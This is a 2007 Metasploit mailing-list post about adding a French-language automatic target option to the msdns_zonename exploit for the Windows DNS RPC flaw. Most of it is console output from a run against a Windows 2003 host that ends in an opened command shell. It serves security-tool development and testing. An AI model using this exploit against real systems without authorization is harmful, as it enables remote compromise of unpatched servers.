Metasploit mailing list archives

msdns_zonename (rev 4711)

From: fab at (Fabrice MOURRON)
Date: Fri, 20 Apr 2007 00:46:14 +0200

With the last release of this module, I had some pain to found an  
easiest way to implement the french targets with the automatic mode.

So, I add a new OptString to select the country language and I add  
some conditions.

It's not very sexy, but it's an easiest way to implement the next  
targets for others languages ;-)

msf exploit(msdns_zonename) > show options

Module options:

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    Language  English           no        Language for automatic  
target: English, French
    RHOST    yes       The target address
    RPORT     0                yes       The target port

Payload options:

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  thread           yes       Exit technique: seh, thread,  
    LPORT     4444             yes       The local port

Exploit target:

    Id  Name
    --  ----
    0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

msf exploit(msdns_zonename) > set Language French
Language => French
msf exploit(msdns_zonename) > rexploit
[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 2189
[*] Connecting to the endpoint mapper service...
[*] Detected a Windows 2003 SP1-SP2 target...
[*] Trying target Windows 2003 Server SP1-SP2 French...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp:[0] ...
[*] Sending exploit...
[*] Sending stage (474 bytes)
[*] Error: no response from dcerpc service
[*] Command shell session 4 opened ( ->

Microsoft Windows [version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.


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